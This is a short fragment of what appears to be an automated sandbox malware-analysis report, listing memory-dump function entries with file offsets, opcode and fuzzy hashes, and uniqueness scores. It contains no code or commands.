                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359409862.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e980022154ab6591bee8661a65039797566f1f462bd756eda3a8fe93ccfbc6ab
                                                                                                • Instruction ID: 70b8033f57013765cb013ee81514257c99140822af35475f91b9e51dc0b88c54
                                                                                                • Opcode Fuzzy Hash: e980022154ab6591bee8661a65039797566f1f462bd756eda3a8fe93ccfbc6ab
                                                                                                • Instruction Fuzzy Hash: EC11E676404280CFCF12CF10E5C4B16BF71FB95314F28C5A9D8090B616C336D866CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00890048, Relevance: .1, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2360015955.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 166c9c4c153fec05920110a889810e0688b22cad1f1a08673570a1a6b985059f
                                                                                                • Instruction ID: 83a394f661f2c3500e303b6e45b22cecf10d6fa63056a6fb48290eefd161e295
                                                                                                • Opcode Fuzzy Hash: 166c9c4c153fec05920110a889810e0688b22cad1f1a08673570a1a6b985059f
                                                                                                • Instruction Fuzzy Hash: 0E11B4B1D016199FCB10CF9AD884BDEFBB4FB49314F14852AE918B7200C375A954CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 008917B4, Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2360015955.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0bfdefce221e6b16103c22f63bf33fc39314f3dd407071d2fb70a58b5a1c835b
                                                                                                • Instruction ID: abd651f271ec1a3ad8fa0eaf4a96dc214c460fa569a5a671393ea07b1f483bde
                                                                                                • Opcode Fuzzy Hash: 0bfdefce221e6b16103c22f63bf33fc39314f3dd407071d2fb70a58b5a1c835b
                                                                                                • Instruction Fuzzy Hash: B9010031A086058BCF18BBB8E48426CBBB2EB84319F15487CD099A7A50DF355C698792
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions